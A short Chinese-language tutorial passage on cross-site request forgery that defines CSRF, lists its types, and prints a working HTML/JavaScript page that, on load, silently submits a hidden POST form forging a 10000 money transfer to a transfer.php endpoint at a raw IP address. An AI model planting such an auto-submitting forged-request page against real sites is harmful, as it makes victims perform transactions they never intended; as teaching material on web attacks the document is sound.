跨站请求伪造(CSRF)
CSRF,全名 Cross Site Request Forgery,跨站请求伪造。很容易将它与 XSS 混淆,对于 CSRF,其两个关键点是跨站点的请求与请求的伪造,由于目标站无 token 或 referer 防御,导致用户的敏感操作的每一个参数都可以被攻击者获知,攻击者即可以伪造一个完全一样的请求以用户的身份达到恶意目的。
按请求类型,可分为 GET 型和 POST 型。
按攻击方式,可分为 HTML CSRF、JSON HiJacking、Flash CSRF 等。
HTML CSRF
使用表单来对 POST 型的请求进行伪造:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39<!--click.html-->
<html>
<body>
<h1>
This page forges an HTTP POST request.
</h1>
<script type="text/javascript">
function post(url, fields) {
//create a <form> element.
var p = document.createElement("form");
//construct the form
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
//append the form to the current page.
document.body.appendChild(p);
//submit the form
p.submit();
}
function csrf_hack() {
var fields;
// The following are form entries that need to be filled out
// by attackers. The entries are made hidden, so the victim
// won't be able to see them.
fields += "<input type='hidden' name='target' value='aaaaaa'>";
fields += "<input type='hidden' name='money' value='10000'>";
fields += "<input type='hidden' name='messages' value='test'>";
post('http://173.82.206.142:8005/transfer.php', fields);
}
// invoke csrf_hack() after the page is loaded.
window.onload = function() {
csrf_hack();
}
</script>
</body>
</html>
